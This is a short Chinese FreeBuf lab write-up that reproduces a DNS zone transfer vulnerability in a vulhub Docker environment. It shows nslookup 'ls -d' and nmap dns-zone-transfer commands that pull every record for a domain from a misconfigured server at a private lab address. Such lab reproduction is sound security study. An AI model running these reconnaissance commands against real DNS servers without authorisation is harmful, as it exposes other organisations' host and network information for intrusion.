freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

DNS域传送漏洞(DNS Zone Transfers)复现
2021-03-27 18:37:02

DNS Zone Transfers(DNS区域传输)是指一台备用服务器使用主服务器的数据来刷新自己的域数据库,其目的是为了防止主域名服务器因意外故障尔影响到整个域名的解析。当主服务器出现故障时,备用服务器就会顶替主服务器而提供域名解析服务。当DNS服务器被错误设置成只要有client发出请求,就会向对方提供一个z域数据库的详细信息时,就产生了DNS域传送漏洞。通过该漏洞,测试人员可以快速收集某个特定域信息,主机信息。

本文仅作漏洞复现记录与实现,利用流程如下:

1.漏洞信息

本环境使用vulhub进行搭建,依次执行以下命令完成搭建

cd vulhub/dns/dns-zone-transfer/

docker-compose up -d

稍等片刻就可以看到开启了udp与tcp协议的53端口

1616840527_605f074fa150ea48572cc.png!small

目标: 192.168.101.152:53

2.利用流程

在Windows使用nslookup工具,依次执行以下指令

nslookup

set type=soa

server 192.168.101.152

ls -d vulhub.org

1616840684_605f07ecc5526c316ede7.png!small

可以看到,成功获取到了vulhub.org的所有子域名

也可以使用nmap进行扫描

nmap --script dns-zone-transfer.nse --script-args "dns-zone-transfer.domain=vulhub.org" -Pn -p 53 192.168.101.152

1616840835_605f0883502d8e03942e7.png!small

到此文章结束

# 漏洞复现
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录